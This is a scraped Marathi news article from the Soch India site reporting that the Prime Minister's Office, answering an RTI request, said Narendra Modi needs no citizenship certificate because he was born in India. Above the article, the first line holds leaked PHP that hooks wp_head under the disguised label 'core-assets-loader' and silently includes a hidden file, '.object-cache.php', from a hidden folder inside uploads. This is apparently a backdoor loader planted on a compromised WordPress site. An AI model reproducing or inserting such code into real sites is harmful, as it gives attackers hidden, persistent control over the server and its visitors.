add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); …म्हणून मोदींना नागरिकत्व सिद्ध करण्यासाठी गरज नाही; सरकारचे उत्तर – SOCH INDIA
Menu

देश
…म्हणून मोदींना नागरिकत्व सिद्ध करण्यासाठी गरज नाही; सरकारचे उत्तर

nobanner

देशभरामध्ये सुधारित नागरिकत्व कायदा (सीएए) आणि राष्ट्रीय नागरिकत्व नोंदणीवरुन (एनआरसी) आंदोलने सुरु आहेत. देशभरामध्ये एनआरसी लागू झाल्यास आपले नागरिकत्व रद्द होईल अशी भिती व्यक्त केली जात आहे. तर दुसरीकडे सरकारने यासंदर्भात वेळोवेळी आपली बाजू स्पष्ट करुन या दोन्ही कायद्यांना घाबरण्याची गरज नसल्याचे म्हटलं आहे. असं असलं तरी या दोन्ही गोष्टींना होणारा विरोध कमी होताना दिसत नाहीय. याच पार्श्वभूमीवर माहिती अधिकार कायद्याअंतर्गत पंतप्रधान नरेंद्र मोदींकडे भारताचे नागरिकत्व सिद्ध करण्यासाठी कोणते दाखले आहेत यासंदर्भातील तपशीलाची मागणी करण्यात आली होती. या माहिती अधिकार अर्जाला (RTI) पंतप्रधान कार्यालयाने (पीएमओ) उत्तर दिलं आहे. या उत्तरामध्ये मोदींचा जन्म भारतात झाल्याने त्यांना नागरिकत्व दाखल्यांची गरज नसल्याचं पीएमओने स्पष्ट केलं आहे.

शुभांकर सरकार यांनी १७ जानेवारी २०२० रोजी माहिती अधिकार कायद्याअंतर्गत पंतप्रधान नरेंद्र मोदींच्या नागरिकत्वाबद्दलचा तपशील आणि त्यांच्याकडे भारताचे नागरिक असल्याचे प्रमाणपत्र (दाखला) आहे का याबद्दलची माहिती मागवली होती. या अर्जाला उत्तर देताना नागरिकत्व कायदा १९५५ च्या कलम ३ नुसार पंतप्रधान मोदी हे जन्माने भारतीय आहेत. त्यामुळे त्यांच्या नागरिकत्व दाखल्यांचा प्रश्नच निर्माण होत नाही, असं उत्तर पीएमओने सरकार यांना दिल्याचे ‘द क्विंट’ या वेबसाईटनं म्हटलं आहे.

नागरिकत्व कायदा १९५५ मधील कलम ३ नुसार २६ जानेवारी १९५० ते १ जुलै १९८७ दरम्यान भारतात जन्म झालेली प्रत्येक व्यक्ती भारतीय ठरते. केवळ उपकलम २ याला अपवाद असल्याचं कायद्यामध्ये म्हटलं आहे. त्यानंतर म्हणजेच १ जुलै १९८७ पासून २००३ चा नागरिकत्व कायदा लागू होईपर्यंतच्या १६ वर्षांच्या कालावधीमध्ये भारतात जन्मलेली किंवा आई-वडील भारतीय असलेली व्यक्ती भरतीय ठरते. मात्र २००३ साली अस्तित्वात आलेल्या नव्या नागरिकत्व कायद्यानुसार २००३ नंतर जन्माला आलेल्या व्यक्तीच्या आई-वडिलांपैकी एकजण अवैध प्रवासी असल्यास त्याला भारतीय म्हणता येत नाही. मोदींचा जन्म १७ सप्टेंबर १९५० रोजी झाला आहे. त्यामुळे नागरिकत्व कायदा १९५५ चा संदर्भ देत मोदी जन्माने भारतीय असून नागरिकत्व सिद्ध करण्यासाठी दाखल्यांची गरज नाही असं पीएमओने म्हटलं आहे.